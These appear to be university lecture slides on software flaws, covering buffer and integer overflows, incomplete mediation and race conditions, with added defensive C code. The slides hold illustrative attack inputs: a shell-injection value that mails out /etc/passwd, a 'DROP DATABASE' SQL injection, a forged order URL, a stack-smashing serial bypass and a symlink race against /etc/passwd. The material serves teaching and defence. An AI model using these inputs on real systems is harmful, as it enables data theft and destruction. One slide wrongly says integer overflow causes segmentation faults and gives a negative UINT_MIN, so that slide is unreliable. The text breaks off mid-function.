Seong-je Cho
Spring 2018
Computer Security & Operating Systems Lab, DKU
Introduction to Software Security
Software Flaws(chapter 11)
Sources / References
Textbook
N. Vlajic, CSE 3482: Introduction to Computer Security, Yorku
Nicholas Weaver, Computer Science 161: Computer Security, Berkeley
Myrto Arapinis, Computer Security: INFRA10067, University of Edinburgh
2011 CWE/SANS Top 25 Most Dangerous Software Errors
Lecture 12 Program Security, CS 450/650 Lecture
Please do not duplicate and distribute
Contents
Software Security Issues
The 10 Worst Vulnerabilities of the last 10 years – Dark Reading
Software Bug/Flaw/Vulnerability
Buffer Overflows
Stack Buffer Overflows = Stack Smashing
Integer Overflows
Incomplete Mediation
Race Conditions, Format String Bugs
Why Software?
Why is software as important to security as crypto, access control and protocols?
Virtually all of information security is implemented in software
If your software is subject to attack, your security is broken, regardless of the strength of crypto, access control or protocols
Software is a poor foundation for security
Software Flaws = Software Vulnerability
Software Weakness
Bad Software
Bad software is everywhere!
NASA Mars Lander (cost $165 million)
Crashed into Mars
Error in converting English and metric units of measure
Denver airport (in 1994)
Buggy baggage handling system
Delayed airport opening by 11 months
Cost of delay exceeded $1 million/day
MV-22 Osprey: Advanced military aircraft
Lives have been lost due to faulty software
SW bugs can prove deadly
Gamers May Fight Deadly Software Bugs in US Military Weapons [Jan. 23 2012, Technews]
A lesson learned when a buggy Patriot missile defense system failed to intercept a Scud missile that killed 28 American soldiers during the first Gulf War in 1991.
To prevent such weapons disasters, the U.S. military wants to transform dull bug-hunting tasks into fun problem-solving games that attract swarms of online players.
Bug can cause deadly failures when anesthesia device is connected to cell phones [Apr. 23 2014, ars-technica]
Federal safety officials have issued an urgent warning about software defects in an anesthesia delivery system that can cause life-threatening failures at unexpected times, including when a cellphone or other device is plugged into one of its USB ports.
Spacelabs Healthcare is recalling the ARKON Anesthesia System with Version 2.0 Software due to a software defect.
anesthesia (vocabulary note): loss of sensation, numbness
The 10 Worst Vulnerabilities of The Last 10 Years
(Dark Reading, 5/6/2016)
See also “The 5 Most Dangerous Software Bugs of 2014”
OpenSSL Heartbleed Vulnerability (CVE-2014-0160)
The Heartbleed Bug in the OpenSSL cryptographic library exposed SSL-based websites and software to attacks that would have allowed information theft on an unprecedented scale.
Nearly one-third of all major websites were believed vulnerable to the issue when Heartbleed was first disclosed in April 2014.
Because the vulnerability existed in the SSL/TLS encryption that websites and software use to protect information, the bug gave attackers an opportunity to eavesdrop on Web traffic, spoof users and servers and steal data directly from them.
Shellshock (CVE-2014-6271)
GNU Bash Remote Code Execution Vulnerability
Shellshock affected most versions of Unix, Linux and Mac OS X and allowed attackers to execute malicious code on vulnerable systems.
Some analysts estimated that nearly half a billion Internet connected devices and web servers were vulnerable to the issue at the time the bug was disclosed, including web servers, Android devices, OpenBSD, DHCP clients, SSH servers and Mac OSX devices.
Stagefright Vulnerabilities: CVE-2015-1538,CVE-2015-1539,CVE-2015-3824
Multiple remotely executable vulnerabilities in Android's Stagefright multimedia framework library pushed Google into instituting a monthly patch release process for Android and put pressure on other handset makers to do the same.
The flaws, in a core Android component that handles all video and audio files and provides playback facilities, affected all versions of Android going back to Froyo and impacted nearly a billion Android devices.
Stagefright basically gave attackers armed with only a victim's phone number a way to use specially crafted MMS messages to execute malicious code on vulnerable devices.
The vulnerabilities did not require the victim to take any action in order for malicious code to be executed on their devices.
The flaws have been described as by far the worst ever to hit Android to date.
Google has patched dozens of vulnerabilities in the media server component since Zimperium's original vulnerability disclosure.
SSL 3.0 Protocol Vulnerability and POODLE Attack (CVE-2014-3566)
The SSL 3.0 Protocol Vulnerability and associated Padding Oracle On Downgraded Legacy Encryption (POODLE) exploit of 2014 stemmed from an implementation weakness in the SSL 3.0 protocol related to the encryption of whole data blocks.
The weakness gives attackers a way to break encrypted communications between a Web server and client browser and to steal authentication cookies and other data.
The POODLE attack basically demonstrated how threat actors could take advantage of a backwards-compatibility feature built into SSL/TLS to force browsers and web servers to use the vulnerable SSL 3.0 protocol and thereby break encrypted communications.
While SSL 3.0 is an old encryption standard and has generally been replaced by TLS, most SSL/TLS implementations remain backwards compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience.
Remote Code Execution Vulnerability in MS Server Service (CVE-2008-4250)
This buffer overflow vulnerability in the Server Service in multiple versions of Windows, including Windows 2000 SP4, XP SP2 and SP3 and Server 2008, gave attackers a way to remotely execute malicious code on vulnerable systems using a specially crafted remote procedure call (RPC) request.
What made the flaw dangerous was the fact that attackers could run arbitrary code on vulnerable systems without any authentication.
glibc: getaddrinfo stack-based buffer overflow (CVE-2015-7547)
In early 2016, security researchers at Google and Red Hat disclosed a critical buffer overflow vulnerability in the GNU C Library (glibc) used by all major Linux distributions.
The flaw existed in a DNS client-side resolver in glibc, and was exploitable through the use of a particular function called getaddrinfo().
It allowed attackers to use DNS servers or domains in their control to essentially takeover systems and applications running the flawed software.
All major Linux distributions and the glibc project have issued patches for the problem.
Bad USB
BadUSB's implications are broad and scary, considering the ubiquitous use of USB devices, according to researchers from Germany-based Security Research Labs who first raised the issue in a Black Hat presentation in 2014.
The researchers showed how it is possible for attackers to convert a benign USB device into a malicious one by quietly reprogramming its controller chip through a firmware update.
According to the researchers, widely used USB controller chips, such as those used in thumb drives, are not protected against such modification.
Reprogrammed USB devices can be used to surreptitiously carry out a slew of malicious tasks including stealing data and files, installing malware, redirecting traffic and infecting other USB devices.
Software Security Issues(Software Bugs)
Threats of Insecure Software
Successful exploitation of insecure software can lead to data breach and information leakage (confidentiality exposure), modification or alteration of data (integrity exposure) and/or defacement, downtime, and denial of service (availability exposure), besides financial loss.
Undetected and surreptitious exploitation can also lead to implantation of malicious software (Malware) within your organization, giving the malicious attacker both the ability and potential to attack any time, even perpetually.
Surreptitious (vocabulary note): secret, stealthy
Perpetually (vocabulary note): permanently, continuously
Software Issues
"Normal" users:
  Find bugs and flaws by accident
  Hate bad software…
  … but must learn to live with it
  Must make bad software work
Attackers:
  Actively look for bugs and flaws
  Like bad software…
  … and try to make it misbehave
  Attack systems through bad software
Complexity
"Complexity is the enemy of security", Paul Kocher, Cryptography Research, Inc.
A new car contains more LOC than was required to land the Apollo astronauts on the moon
System          Lines of code (LOC)
Netscape        17,000,000
Space shuttle   10,000,000
Linux            1,500,000
Windows XP      40,000,000
Boeing 777       7,000,000
Lines of Code and Bugs
Conservative estimate: 5 bugs per 1000 LOC
Do the math:
Typical computer: 3,000 exe's of 10K LOC each
Conservative estimate of 50 bugs per exe
About 3K x 50 = 150K bugs per computer
A 30,000-node network has 4.5 billion bugs
Suppose that only 10% of bugs are security-critical and only 10% of those are remotely exploitable
Then "only" 45 million critical security flaws!
Software Security Topics
Program flaws (unintentional)
Buffer overflow
Incomplete mediation
Race conditions
Malicious software (intentional)
Viruses
Worms
Other breeds of malware
Program Flaws
An error is a programming mistake (to err is human)
An error may lead to an incorrect state: a fault
A fault is internal to the program
A fault may lead to a failure, where the system departs from its expected behavior
A failure is externally observable
Error -> Fault -> Failure
Example
char array[10];
int i;
for (i = 0; i < 10; ++i)
    array[i] = 'A';
array[10] = 'B';   /* writes one element past the end of array */
This program has an error (the write to array[10])
This error might cause a fault: incorrect internal state
If a fault occurs, it might lead to a failure: the program behaves incorrectly (externally observable)
We use the term flaw for all of the above
Program Flaws
Program flaws are unintentional, but still create security risks
We'll consider 3~4 types of flaws:
Buffer overflow (smashing the stack)
Integer overflow
Incomplete mediation
Race conditions (?)
Many other flaws can occur; these are the most common
Secure Software
In software engineering, try to ensure that a program does what is intended
Secure software engineering requires that the software does what is intended… and nothing more
Absolutely secure software is impossible
Absolute security is almost never possible!
How can we manage the risks?
Buffer Overflow (BoF)
Example Vulnerable C Program
#include <string.h>
#define MAX_LEN 10
int unsafe(char *a, char *b) {
    char t[MAX_LEN];
    strcpy(t, a);        /* no bound check: a may be longer than MAX_LEN */
    strcat(t, b);        /* appends without checking the remaining space */
    return strcmp(t, "abc");
}
unsafe("123", "abc");               /* "123abc": 6 chars + NUL fits in t */
unsafe("1234567", "890abcdef");     /* 16 chars + NUL overflows the 10-byte t */
An Unsafe Program
#include <stdio.h>
#include <limits.h>
int i;
unsigned int j;
i = INT_MAX;     // 2,147,483,647
i++;             // signed overflow: undefined behaviour in C; wraps to INT_MIN on common compilers
printf("i = %d \n", i);
j = UINT_MAX;    // 4,294,967,295
j++;             // unsigned arithmetic wraps modulo 2^32
printf("j = %u \n", j);
Output:
i = -2147483648
j = 0
1988: Morris Internet Worm
fingerd.c:
char line[512];
…
line[0] = '\0';
gets(line);      /* gets() has no length bound: input longer than 511 bytes overflows line */
Results in 6,000 computers being infected.
Fingerd bug fix:
memset(line, 0, sizeof(line));
fgets(line, sizeof(line), stdin);
String Null Termination Errors #1
#include <string.h>
int main(int argc, char *argv[]) {
    char cmdline[4096];
    cmdline[0] = '\0';   // what if this line were missing?
    for (int i = 1; i < argc; ++i) {
        strcat(cmdline, argv[i]);
        strcat(cmdline, " ");
    }
    /* … */
    return 0;
}
strcat – append a string to another
ptr = strcat(s1, s2);
• Both strings "s1" and "s2" must be terminated by the usual '\0' character.
String Null Termination Errors #2
char *string_data;
char a[16];
/* ... */
strncpy(a, string_data, sizeof(a));
How many problems are there?
If string_data is NULL, …
If the length of string_data is greater than the size of a, …
- 32 -
Null-Termination Errors
Another common problem with C-style strings is a failure to properly null terminate
#include <string.h>
int main(int argc, char* argv[]) {
    char a[16];
    char b[16];
    char c[32];
    strncpy(a, "0123456789abcdef", sizeof(a));   /* fills all 16 bytes: no room for a NUL */
    strncpy(b, "0123456789abcdef", sizeof(b));   /* same problem */
    strncpy(c, a, sizeof(c));                    /* reads past the end of a[] looking for a NUL */
}
Neither a[] nor b[] is properly terminated
Passing Strings to Complex Subsystems
Improper Data Sanitization
● An application inputs an email address from a user and writes the address to a buffer [Viega 03]
sprintf(buffer, "/bin/mail %s < /tmp/email", addr);
system(buffer);
Normal input: [email protected]
What if: [email protected]; cat /etc/passwd | mail [email protected]
[Viega 03] Viega, J., and M. Messier. Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Networking, Input Validation & More. Sebastopol, CA: O'Reilly, 2003.
Typical Attack Scenario
1. Users enter data into a Web form
2. Web form is sent to server
3. Server writes data to buffer, without checking length of input data
4. Data overflows from buffer
Sometimes, overflow can enable an attack
Web form attack could be carried out by anyone with an Internet connection
Buffer Overflow
int main() {
    int arr[10];
    int buffer[10];
    buffer[20] = 37;   /* out of bounds: 10 ints past the end of buffer */
    buffer[30] = 58;   /* out of bounds: 20 ints past the end of buffer */
}
Q: What happens when this is executed?
A: It depends on what resides in memory at locations "buffer[20]" and "buffer[30]"
Might overwrite user data or code
Might overwrite system data or code
Simple Buffer Overflow
Consider a Boolean flag for authentication
Buffer overflow could overwrite the flag, allowing anyone to authenticate!
In some cases, the attacker need not be so lucky as to have the overflow overwrite the flag
[Figure: a buffer holding "F O U R S C …" sits next to the Boolean flag; the overflow spills into the flag and changes it from F to T]
Memory Organization
Text == code
Data == static variables
Heap == dynamic data
Stack == "scratch paper": dynamic local variables, parameters to functions, return address
[Figure: address space from high address to low address: stack (SP), heap, data, text]
Simplified Stack Example
void func(int a, int b) {
    char buffer[10];
}
void main() {
    func(1, 2);
}
[Figure: stack frame of func, from high address to low address: b, a, ret (the return address), buffer; SP points at the low end of the frame]
Smashing the Stack
What happens if buffer overflows?
[Figure: the overflow runs from buffer toward higher addresses, over ret and a; ret now holds overflow bytes ("ret…", shown as NOT! / ??? on the slide)]
Program "returns" to the wrong location
A crash is likely
Stack Smashing Example
Program asks for a serial number that the attacker does not know
Attacker also does not have the source code; attacker does have the executable (exe)
Program quits on incorrect serial number
By trial and error, attacker discovers an apparent buffer overflow
Note that 0x41 is "A"
Looks like ret overwritten by 2 bytes!
Next, disassemble bo.exe to find
The goal is to exploit the buffer overflow to jump to address 0x401034
Find that 0x401034 is "@^P4" in ASCII
Byte order is reversed? Why?
x86 processors are "little-endian"
Reverse the byte order to "4^P@" and…
Success! We've bypassed the serial number check by exploiting a buffer overflow
Overwrote the return address on the stack
Attacker did not require access to the source code
Only tool used was a disassembler to determine the address to jump to
Can find the address by trial and error
Necessary if attacker does not have the exe
For example, a remote attack
Source code of the buffer overflow
Flaw easily found by attacker
Even without the source code!
Stack Smashing Prevention
1st choice: employ a non-executable stack: "No execute" NX bit (if available)
Seems like the logical thing to do, but some real code executes on the stack! (Java does this)
2nd choice: use safe languages (Java, C#)
3rd choice: use safer C functions. For unsafe functions, there are safer versions
For example, strncpy / strlcpy instead of strcpy
Example Vulnerable C Program Fix
#include <string.h>
#define MAX_LEN 10
int unsafe(char *a, char *b) {
    char t[MAX_LEN];
    strcpy(t, a);
    strcat(t, b);
    return strcmp(t, "abc");
}
unsafe("1234567", "890abcdef");   /* 16 chars + NUL written into a 10-byte buffer */
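The fix itself is not shown on the slide. The following is an added example, not the lecture's code: a bounded copy/append pair that always NUL-terminates and reports when input does not fit, used to harden unsafe() from the "Example Vulnerable C Program" slide and to handle the strncpy() cases from the "String Null Termination Errors" slides. The names copy_bounded, append_bounded, safe_compare and INPUT_REJECTED are this example's own.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define MAX_LEN 10
#define INPUT_REJECTED (-2)   /* distinct from any normalised strcmp() result */

/* Length of s, scanning at most limit bytes (like POSIX strnlen). */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Copy src into dst (capacity dst_size), always leaving dst NUL-terminated.
 * Returns false if src is NULL or would not fit, in which case dst is "".
 * This is exactly what strncpy() does not give you: it neither reports
 * truncation nor terminates dst when src fills the whole buffer. */
static bool copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || dst_size == 0)
        return false;
    dst[0] = '\0';
    if (src == NULL)
        return false;
    size_t n = bounded_len(src, dst_size);  /* never reads past dst_size bytes of src */
    if (n >= dst_size)                      /* no room left for the terminator */
        return false;
    memcpy(dst, src, n + 1);                /* n characters plus the NUL */
    return true;
}

/* Append src to the string already in dst, with the same guarantees. */
static bool append_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || dst_size == 0)
        return false;
    size_t used = bounded_len(dst, dst_size);
    if (used >= dst_size)                   /* dst is not terminated: do not trust it */
        return false;
    return copy_bounded(dst + used, dst_size - used, src);
}

/* Hardened counterpart of the slide's unsafe(): builds a + b in a MAX_LEN
 * buffer and compares it with "abc".  Returns -1/0/1 like a normalised
 * strcmp(), or INPUT_REJECTED when the concatenation would not fit. */
int safe_compare(const char *a, const char *b)
{
    char t[MAX_LEN];
    if (!copy_bounded(t, sizeof t, a) || !append_bounded(t, sizeof t, b))
        return INPUT_REJECTED;
    int c = strcmp(t, "abc");
    return (c > 0) - (c < 0);
}

/* The slide's strncpy(a, "0123456789abcdef", sizeof(a)) fills a[] with no NUL.
 * copy_bounded() refuses the same input and leaves a[] as an empty string.
 * Returns 1 when that is what happened. */
int strncpy_case_is_rejected(void)
{
    char a[16];
    return copy_bounded(a, sizeof a, "0123456789abcdef") == false && a[0] == '\0';
}

int main(void)
{
    printf("(\"123\", \"abc\")           -> %d\n", safe_compare("123", "abc"));
    printf("(\"1234567\", \"890abcdef\") -> %d (rejected)\n",
           safe_compare("1234567", "890abcdef"));
    printf("strncpy case rejected: %d\n", strncpy_case_is_rejected());
    return 0;
}
```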
Integer Overflow
Integer Overflow Examples
Example 1
#include <stdio.h>
int main(void) {
    unsigned int num = 0xffffffff;
    printf("num = %u (0x%x)\n", num, num);
    printf("num + 1 = 0x%x\n", num + 1);    /* unsigned arithmetic wraps modulo 2^32 */
    return 0;
}
/* EOF */
The output of this program looks like this:
num = 4294967295 (0xffffffff)
num + 1 = 0x0
Example 2
#include <stdio.h>
int main(void) {
    int n;
    n = 0x7fffffff;
    printf("n = %d (0x%x)\n", n, n);
    printf("n + 1 = %d (0x%x)\n", n + 1, n + 1);   /* signed overflow: undefined behaviour in C */
    return 0;
}
/* EOF */
The output of which is:
n = 2147483647 (0x7fffffff)
n + 1 = -2147483648 (0x80000000)
Integer Overflow Errors: Addition/Subtraction/Multiplication
unsigned int ui1, ui2, usum;
/* Initialize ui1 and ui2 */
usum = ui1 + ui2;        /* wraps silently if the sum exceeds UINT_MAX */
UINT_MAX = ?
INT_MAX = ?
INT_MIN = ?
sizeof(signed int) = ?
signed int si1, si2, result;
/* Initialize si1 and si2 */
result = si1 * si2;      /* signed overflow is undefined behaviour in C */
signed int si1, si2, result;
/* Initialize si1 and si2 */
result = si1 - si2;      /* signed overflow is undefined behaviour in C */
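An added example (not from the lecture) showing how the three slide expressions are checked before they are evaluated, so that unsigned wrap and undefined signed overflow are detected instead of silently producing a wrong size or index. The function names add_uint_checked, sub_int_checked and mul_int_checked are this example's own; the bound tests follow the usual precondition style with only limits.h.

```c
#include <stdio.h>
#include <stdbool.h>
#include <limits.h>

/* For a typical 32-bit int the slide's questions answer as:
 *   UINT_MAX = 4294967295, INT_MAX = 2147483647, INT_MIN = -2147483648,
 *   sizeof(signed int) = 4.  The checks below use only limits.h, so they
 *   remain correct on a platform where int has another width. */

/* usum = ui1 + ui2: unsigned addition never traps, it wraps modulo UINT_MAX+1. */
bool add_uint_checked(unsigned int ui1, unsigned int ui2, unsigned int *usum)
{
    if (ui1 > UINT_MAX - ui2)       /* the sum would wrap around */
        return false;
    *usum = ui1 + ui2;
    return true;
}

/* result = si1 - si2: signed overflow is undefined behaviour in C, so the
 * range test must happen before the subtraction is ever evaluated. */
bool sub_int_checked(int si1, int si2, int *result)
{
    if ((si2 > 0 && si1 < INT_MIN + si2) ||   /* would fall below INT_MIN */
        (si2 < 0 && si1 > INT_MAX + si2))     /* would rise above INT_MAX */
        return false;
    *result = si1 - si2;
    return true;
}

/* result = si1 * si2: one comparison per sign combination, done with
 * division so that the test itself cannot overflow. */
bool mul_int_checked(int si1, int si2, int *result)
{
    if (si1 > 0) {
        if (si2 > 0) { if (si1 > INT_MAX / si2) return false; }
        else         { if (si2 < INT_MIN / si1) return false; }
    } else {
        if (si2 > 0) { if (si1 < INT_MIN / si2) return false; }
        else         { if (si1 != 0 && si2 < INT_MAX / si1) return false; }
    }
    *result = si1 * si2;
    return true;
}

/* The unsigned wrap from the "Integer Overflow Examples" slide: 0xffffffff + 1. */
unsigned int wrap_unsigned_demo(void)
{
    unsigned int num = 0xffffffffu;
    return num + 1u;                /* 0: the carry out of bit 31 is simply lost */
}

/* Boundary inputs that must be rejected; returns how many of the four were. */
int demo_overflows_detected(void)
{
    unsigned int u; int r;
    return !add_uint_checked(UINT_MAX, 1u, &u)
         + !sub_int_checked(INT_MIN, 1, &r)
         + !mul_int_checked(INT_MAX, 2, &r)
         + !mul_int_checked(46341, 46341, &r);   /* 46341^2 = 2147488281 > INT_MAX */
}

/* In-range inputs must pass and produce the exact result; returns 1 if so. */
int demo_in_range_results(void)
{
    unsigned int u; int r1, r2;
    return add_uint_checked(UINT_MAX - 1u, 1u, &u) && u == UINT_MAX
        && sub_int_checked(INT_MIN + 1, 1, &r1) && r1 == INT_MIN
        && mul_int_checked(-46341, 46340, &r2) && r2 == -2147441940;
}

int main(void)
{
    printf("0xffffffff + 1 = %u\n", wrap_unsigned_demo());
    printf("overflows detected: %d of 4\n", demo_overflows_detected());
    printf("in-range results correct: %d\n", demo_in_range_results());
    return 0;
}
```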
- 57 -
Integer Ranges
Example integer ranges
Integer overflow
The size of int depends on the architecture.
● So on the i386 architecture (32-bit), an int is 32 bits.
● If this value can be controlled and a value is submitted that is larger in size than 32 bits, we will successfully overflow memory.
So in C the maximum value of a signed int is INT_MAX = 2147483647,
and the maximum value of an unsigned int is UINT_MAX = 4294967295 (0xffffffff).
If a value larger than INT_MAX is used, it will trigger a segmentation fault.
Integer underflow
If the integer value used is less than the minimum signed or unsigned int,
this is called an underflow and will also trigger a segmentation fault,
because the binary unsigned int -4294967295 is similar to the binary representation of the signed int -1 in memory.
INT_MIN = -2147483647-1
UINT_MIN = -4294967295
Secure Coding
Fun with Integers
#include <stdio.h>
int main(void) {
    char x, y;
    x = -128;
    y = -x;                                /* -x is computed as the int 128; storing it in a char wraps */
    if (x == y) puts("1");
    if ((x - y) == 0) puts("2");
    if ((x + y) == 2 * x) puts("3");
    if (((char)(-x) + x) != 0) puts("4");
    if (x != -y) puts("5");
    return 0;
}
Secure Coding
Type Conversion
Implicit Conversions
Incomplete Mediation
Incomplete mediation
Failure to perform “sanity checks” on data can lead to random or carefully planned flaws.
Examples:
Impossible dates in correct format (say yyyyMMMdd): 1800Feb30, 2048Min32
What happens when these dates are looked up in tables in the program?
Alterable parameter fields in URL:
http://www.things.com/order/final&custID=101&part=555A&qy=20&price=10&ship=boat&total=205
Web site adds parameters incrementally as transaction proceeds. User can change them inconsistently.
Incomplete mediation
Inputs to programs are often specified by untrusted users
Web-based applications are a common example
Users sometimes mistype data in forms
Phone number: 51998884567
Email: iang#cs.uwaterloo.ca
An application needs to ensure that what user has entered constitutes a meaningful request
This is called mediation
Incomplete mediation occurs when the application accepts incorrect data from user
Sometimes this is hard to avoid
Phone number: 519-886-4567
This is a reasonable entry, that happens to be wrong
Incomplete mediation
We focus on catching entries that are clearly wrong
Not well formed
DOB: 1980-04-31
Unreasonable values
DOB: 1876-10-12
Inconsistent with other entries
Why do we care?
What happens if someone fills in:
DOB: 98764874236492483649247836489236492
» Buffer overflow?
DOB: '; DROP DATABASE clients --
» SQL injection?
We need to make sure that any user-supplied input falls within well-specified values
known to be safe
Incomplete Mediation
Sensitive data are in exposed, uncontrolled condition
Unchecked data are a serious vulnerability!
Possible scenarios
Supplying the wrong type of data being requested.
Supplying the wrong length of data being requested.
In a system, a user is allowed to edit input directly
In a system, a server does not check validity of data values received from client
In a system, a client returns a sensitive result (like total) that can be easily recomputed by server
Problems
System fails
Supply of Bad Data
Must be checked by programmer
Client side versus server side
Input Validation
Consider: strcpy(buffer, argv[1])
A buffer overflow occurs if
len(buffer) < len(argv[1])
Software must validate the input by checking the length of argv[1]
Failure to do so is an example of a more general problem: incomplete mediation
Input Validation
Consider web form data: a URL to be generated by the client's browser to access the server.
GET and POST requests (Which is more secure?)
Suppose input is validated on the client
For example, the following is valid:
http://www.things.com/orders/final&custID=112&num=55A&qty=20&price=10&shipping=5&total=205
Suppose input is not checked on the server. Why bother, since input was checked on the client?
Then the attacker could send the http message
http://www.things.com/orders/final&custID=112&num=55A&qty=20&price=10&shipping=5&total=25
User uses forged URL to access server
Incomplete Mediation
Linux kernel
Research has revealed many buffer overflows
Many of these are due to incomplete mediation
Linux kernel is “good” software since
Open-source
Kernel written by coding gurus
Tools exist to help find such problems
But incomplete mediation errors can be subtle
And tools useful to attackers too!
Incomplete Mediation (ex. SQL Injection)
Input: John Fiore
SELECT * FROM CUSTOMERS WHERE name = 'John Fiore'
Input: John Fiore' or '1'='1
SELECT * FROM CUSTOMERS WHERE name = 'John Fiore' OR '1'='1'
Client-side mediation
forms that do client-side mediation
When you click “submit”, Javascript code will first run validation checks on the data you entered
If you enter invalid data, a popup will prevent you from submitting it
Related issue: client-side state
Many web sites rely on the client to keep state for them
Put hidden fields in the form which are passed back to the server when user submits the form
Problem: what if the user
Turns off Javascript?
Edits the form before submitting it?
Writes a script that interacts with the web server instead of using a web browser at all?
Connects to the server “manually”?
telnet server.com 80
Note that the user can send arbitrary (unmediated) values to the server this way
The user can also modify any client-side state
Defenses
Client-side mediation is an OK method to use in order to have a friendlier user interface
but is useless for security purposes.
You have to do server-side mediation
whether or not you also do client-side
For values entered by the user
Always do very careful checks on the values of all fields
These values can potentially contain completely arbitrary 8-bit data and be of any length
For state stored by the client:
Make sure the client has not modified the data in any way
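Server-side mediation of the order URL from the "Input Validation" slide, as an added example (not the lecture's code): every field is checked against a whitelist of type, length and range, unknown parameters are refused, and the client-supplied total is recomputed rather than believed, which is what catches the forged total=25 request. The struct and function names are this example's own; in a real shop the price would also come from the server's catalogue rather than the client, but the slide's fields are kept here.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <ctype.h>
#include <limits.h>

struct order { long cust_id, qty, price, shipping, total; char num[16]; };

/* Strict non-negative decimal: every character a digit, no sign, no
 * whitespace, value within [0, max].  Returns 0 on success, -1 otherwise. */
static int parse_bounded_long(const char *s, long max, long *out)
{
    char *end;
    if (!isdigit((unsigned char)s[0]))
        return -1;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno != 0 || *end != '\0' || v < 0 || v > max)
        return -1;
    *out = v;
    return 0;
}

/* Part numbers such as "55A": 1 to 15 alphanumerics, nothing else (so quotes,
 * semicolons and spaces from an injection attempt are rejected outright). */
static int parse_part_number(const char *s, char out[16])
{
    size_t n = strlen(s);
    if (n == 0 || n >= 16)
        return -1;
    for (size_t i = 0; i < n; i++)
        if (!isalnum((unsigned char)s[i]))
            return -1;
    memcpy(out, s, n + 1);
    return 0;
}

/* Server-side mediation of the slide's query string.  Returns 0 only if every
 * field is present and well formed AND the client-supplied total equals the
 * server's own recomputation; negative codes name the first failure.
 * The query is copied into a bounded buffer because strtok() edits its input. */
int mediate_order(const char *query, struct order *o)
{
    char buf[256];
    int seen = 0;
    size_t len = strlen(query);
    if (len >= sizeof buf)                 /* length bound before any parsing */
        return -1;
    memcpy(buf, query, len + 1);
    memset(o, 0, sizeof *o);
    for (char *pair = strtok(buf, "&"); pair != NULL; pair = strtok(NULL, "&")) {
        char *eq = strchr(pair, '=');
        if (eq == NULL)
            return -2;                     /* not key=value */
        *eq = '\0';
        const char *key = pair, *val = eq + 1;
        int rc;
        if      (!strcmp(key, "custID"))   { rc = parse_bounded_long(val, 999999, &o->cust_id);    seen |= 1; }
        else if (!strcmp(key, "num"))      { rc = parse_part_number(val, o->num);                  seen |= 2; }
        else if (!strcmp(key, "qty"))      { rc = parse_bounded_long(val, 1000, &o->qty);          seen |= 4; }
        else if (!strcmp(key, "price"))    { rc = parse_bounded_long(val, 100000, &o->price);      seen |= 8; }
        else if (!strcmp(key, "shipping")) { rc = parse_bounded_long(val, 100000, &o->shipping);   seen |= 16; }
        else if (!strcmp(key, "total"))    { rc = parse_bounded_long(val, LONG_MAX / 4, &o->total); seen |= 32; }
        else return -3;                    /* parameter the form never defined */
        if (rc != 0)
            return -4;                     /* malformed value */
    }
    if (seen != 63)
        return -5;                         /* a required field is missing */
    /* Client-side state is not trusted: the bounds above keep qty * price
     * well inside a long, and the total is recomputed rather than believed. */
    long expected = o->qty * o->price + o->shipping;
    return (o->total == expected) ? 0 : -6;
}

/* Convenience wrapper: mediation result for a query, order details discarded. */
int check_order(const char *query)
{
    struct order o;
    return mediate_order(query, &o);
}

int main(void)
{
    const char *valid  = "custID=112&num=55A&qty=20&price=10&shipping=5&total=205";
    const char *forged = "custID=112&num=55A&qty=20&price=10&shipping=5&total=25";
    printf("valid  -> %d\n", check_order(valid));    /* 0 */
    printf("forged -> %d\n", check_order(forged));   /* -6: total does not match */
    return 0;
}
```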
Race Conditions(Time-of-Check to Time-of-Use Errors)
Race Condition
Security processes should be atomic
Occur “all at once”
Race conditions can arise when a security-critical process occurs in stages
Race condition errors are also known as TOCTTOU ("TOCK-too") errors
Attacker makes a change between stages
Often, after the stage that gives authorization but before the stage that transfers ownership
Example: Unix mkdir
mkdir Race Condition
mkdir creates a new directory. How mkdir is supposed to work:
1. Allocate space
2. Transfer ownership
mkdir Attack
Not really a "race", but the attacker's timing is critical:
1. Allocate space
2. (Attacker) Create link to password file
3. Transfer ownership
The mkdir race condition
Race Conditions
Race conditions are common
Race conditions may be more prevalent than buffer overflows
But race conditions harder to exploit
Buffer overflow is “low hanging fruit” today
To prevent race conditions, make security-critical processes atomic
Occur all at once, not in stages
Not always easy to accomplish in practice
Time-of-check to Time-of-use (TOCTTOU)
A delay between checking permission to perform certain operations and using this permission may enable the operations to be changed.
Example:
1) User attempts to write 100 bytes at the end of file "abc".
Description of the operation is stored in a data structure.
2) OS checks the user's permissions on a copy of the data structure.
3) While the user's permissions are being checked, the user changes the data structure to describe an operation to delete file "xyz".
Can you find further examples?
Summary, Q & A
Software bug
Software vulnerability
Software security vs. Software quality
Type conversion errors
Null pointer errors
Integer overflow/underflow
Format string bugs: http://null-byte.wonderhowto.com/how-to/security-oriented-c-tutorial-0x14-format-string-vulnerability-part-i-buffer-overflows-nasty-little-brother-0167254/
• What types of threat are related to this lecture? Consider the STRIDE model!
Race Conditions: Example
• A setuid program allocates terminals to users
– a privileged operation
– supports writing contents of terminal to a log file
• first checks if the user has permissions to write to the requested file; if so, it opens the file for writing
• The attacker makes a symbolic link:
logfile -> file_he_owns
• Between the “check” and the “open”, he changes it:
logfile -> /etc/passwd
Race Conditions: The problem
• State of the system changed between the check for permission and the execution of operation
• File whose permissions were checked for writeability by the user (file_he_owns) wasn't the same file that was later written to (/etc/passwd)
– Even though they had the same name (logfile) at different points in time
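An added example (not the lecture's code) of the logfile scenario from the last two slides: the racy check-then-open pattern beside a version that opens first and then inspects the descriptor it actually got, so that re-pointing "logfile" at /etc/passwd between check and use no longer helps. The function names are this example's own; it assumes a POSIX system with O_NOFOLLOW and a writable /tmp, and the demo only creates and removes its own constructed files.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/stat.h>

/* The racy pattern from the slide: the name is checked, then the name is used.
 * Between the two calls "logfile" can be re-pointed at /etc/passwd.
 * Kept for contrast; the demo below never calls it. */
int open_log_racy(const char *path)
{
    if (access(path, W_OK) != 0)                   /* check, by name */
        return -1;
    return open(path, O_WRONLY | O_APPEND);        /* use, by name again */
}

/* Hardened version: open first, then check the object that was actually opened.
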